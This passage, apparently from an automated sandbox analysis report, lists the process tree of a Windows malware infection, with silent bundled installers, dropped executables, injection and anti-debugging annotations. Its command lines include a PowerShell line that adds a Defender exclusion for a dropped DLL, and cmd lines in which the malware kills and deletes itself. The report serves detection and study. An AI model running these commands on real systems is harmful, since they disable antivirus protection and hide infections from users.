                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:6940
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FGFC8.tmp\Setup.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FGFC8.tmp\Setup.exe" /Verysilent
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:2304
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:8304
                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586626 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5816
                                                                                                                                                                        • C:\Users\Admin\Documents\fhI9MAu8Qc087uWiQZWjP923.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\fhI9MAu8Qc087uWiQZWjP923.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6864
                                                                                                                                                                          • C:\Users\Admin\Documents\wboBi3jRyxI7dXgNZpcp6RcZ.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\wboBi3jRyxI7dXgNZpcp6RcZ.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6916
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 716
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:9188
                                                                                                                                                                            • C:\Users\Admin\Documents\UtERZQGSIyS_I99bhYMkf33V.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\UtERZQGSIyS_I99bhYMkf33V.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              PID:4512
                                                                                                                                                                            • C:\Users\Admin\Documents\jSKaVyvSjrKRVfP9aM89B6TL.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\jSKaVyvSjrKRVfP9aM89B6TL.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6984
                                                                                                                                                                              • C:\Users\Admin\Documents\y5nZX4LfHER_IhbCe2NmUytm.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\y5nZX4LfHER_IhbCe2NmUytm.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:6736
                                                                                                                                                                                • C:\Users\Admin\Documents\y5nZX4LfHER_IhbCe2NmUytm.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\y5nZX4LfHER_IhbCe2NmUytm.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                  PID:5504
                                                                                                                                                                              • C:\Users\Admin\Documents\3dDFdeA_uT6nnT3jquLRdon6.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\3dDFdeA_uT6nnT3jquLRdon6.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:4572
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5547397.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5547397.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4872
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8618774.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8618774.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:7832
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5024276.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5024276.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:8024
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5329623.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5329623.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                          PID:5948
                                                                                                                                                                                      • C:\Users\Admin\Documents\NxsLPYBOwsNl_chnOXr7dFAG.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\NxsLPYBOwsNl_chnOXr7dFAG.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:6832
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "NxsLPYBOwsNl_chnOXr7dFAG.exe" /f & erase "C:\Users\Admin\Documents\NxsLPYBOwsNl_chnOXr7dFAG.exe" & exit
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:8572
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /im "NxsLPYBOwsNl_chnOXr7dFAG.exe" /f
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:8656
                                                                                                                                                                                          • C:\Users\Admin\Documents\Kz9zL66wrB9Vjkxfbkb9UNQj.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\Kz9zL66wrB9Vjkxfbkb9UNQj.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:5564
                                                                                                                                                                                          • C:\Users\Admin\Documents\AM3GUJ1tAET8dtX4Zt2jH3WZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\AM3GUJ1tAET8dtX4Zt2jH3WZ.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:5340
                                                                                                                                                                                            • C:\Users\Admin\Documents\AM3GUJ1tAET8dtX4Zt2jH3WZ.exe
                                                                                                                                                                                              C:\Users\Admin\Documents\AM3GUJ1tAET8dtX4Zt2jH3WZ.exe
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:7440
                                                                                                                                                                                            • C:\Users\Admin\Documents\JPq7VKeUTG17IjklxXD3PY7m.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\JPq7VKeUTG17IjklxXD3PY7m.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7112
                                                                                                                                                                                              • C:\Users\Admin\Documents\Q2UpJADKDfg_AxO49kvH5iaZ.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\Q2UpJADKDfg_AxO49kvH5iaZ.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:7104
                                                                                                                                                                                                • C:\Users\Admin\Documents\UjrOhszX2nzig0BpUhoN20J5.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\UjrOhszX2nzig0BpUhoN20J5.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:7096
                                                                                                                                                                                                • C:\Users\Admin\Documents\lF6ot5SAKvXWwAOmgZ2fvCwY.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\lF6ot5SAKvXWwAOmgZ2fvCwY.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:7088
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 760
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:7596
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 812
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:7024
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 820
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4660
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 960
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:8388
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 984
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:8568
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 1016
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:8744
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 1420
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:3828
                                                                                                                                                                                                  • C:\Users\Admin\Documents\P_WWDakxBrQmiNvIJc4oU_oX.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\P_WWDakxBrQmiNvIJc4oU_oX.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:7080
                                                                                                                                                                                                    • C:\Users\Admin\Documents\P_WWDakxBrQmiNvIJc4oU_oX.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\P_WWDakxBrQmiNvIJc4oU_oX.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5800
                                                                                                                                                                                                    • C:\Users\Admin\Documents\Dz5dLsS57tJ0obg_M7mnL0Qh.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\Dz5dLsS57tJ0obg_M7mnL0Qh.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:6868
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Dz5dLsS57tJ0obg_M7mnL0Qh.exe" /f & erase "C:\Users\Admin\Documents\Dz5dLsS57tJ0obg_M7mnL0Qh.exe" & exit
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4292
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im "Dz5dLsS57tJ0obg_M7mnL0Qh.exe" /f
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:4764
                                                                                                                                                                                                        • C:\Users\Admin\Documents\6rYwT9Ah9kVgujQ_Trl9hBb7.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\6rYwT9Ah9kVgujQ_Trl9hBb7.exe"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5468
                                                                                                                                                                                                            • C:\Users\Admin\Documents\6rYwT9Ah9kVgujQ_Trl9hBb7.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\6rYwT9Ah9kVgujQ_Trl9hBb7.exe" -q
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:7588
                                                                                                                                                                                                            • C:\Users\Admin\Documents\HgWu2qrAewzuL1W2zde6VD3f.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\HgWu2qrAewzuL1W2zde6VD3f.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:7516
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\HGWU2Q~1.DLL,s C:\Users\Admin\DOCUME~1\HGWU2Q~1.EXE
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:8468
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HGWU2Q~1.DLL,UBw0UQ==
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:11120
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\HGWU2Q~1.DLL
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:1900
                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5516
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:4272
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5372
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5324
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-R6NC5.tmp\VPN.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-R6NC5.tmp\VPN.tmp" /SL5="$5025C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:5676
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JT538.tmp\Setup.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JT538.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6368
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-I14N8.tmp\Setup.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-I14N8.tmp\Setup.tmp" /SL5="$2043E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-JT538.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:7188
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6224
                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                              tapinstall.exe remove tap0901
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              PID:5912
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:8748
                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:8748
                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:10732
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-V3PKU.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-V3PKU.tmp\WEATHER Manager.tmp" /SL5="$103A4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:5600
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-BL5GR.tmp\Setup.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-BL5GR.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                PID:6460
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-BL5GR.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-BL5GR.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586626 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6612
                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                PID:5660
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4552
                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  PID:6048
                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding A2D1B54D44C4375C53762C13F74FD685 C
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:7760
                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding EC89E746639FE32D674052527B62F119 C
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:7348
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding CD573EF58E34FBDB30FD93551D19109B
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:8992
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 31BF21F9111A357FE5362385928068F1 C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:4552
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-C7VC6.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-C7VC6.tmp\ultramediaburner.tmp" /SL5="$403CA,281924,62464,C:\Program Files\Microsoft Office\CHZUJUMUFV\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:6388
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                        PID:8644
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:8660
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:8072
                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:7932
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:9892
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:10180
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:9872
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:6284
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\573C.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\573C.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2124
                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                        PID:5180
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:5132
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8448.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8448.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3932
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5524
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{13f33de7-6f39-3144-90fc-f354c4d18523}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:10196
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4636
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\92EF.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\92EF.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6364
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                        notepad.exe
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:9624
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
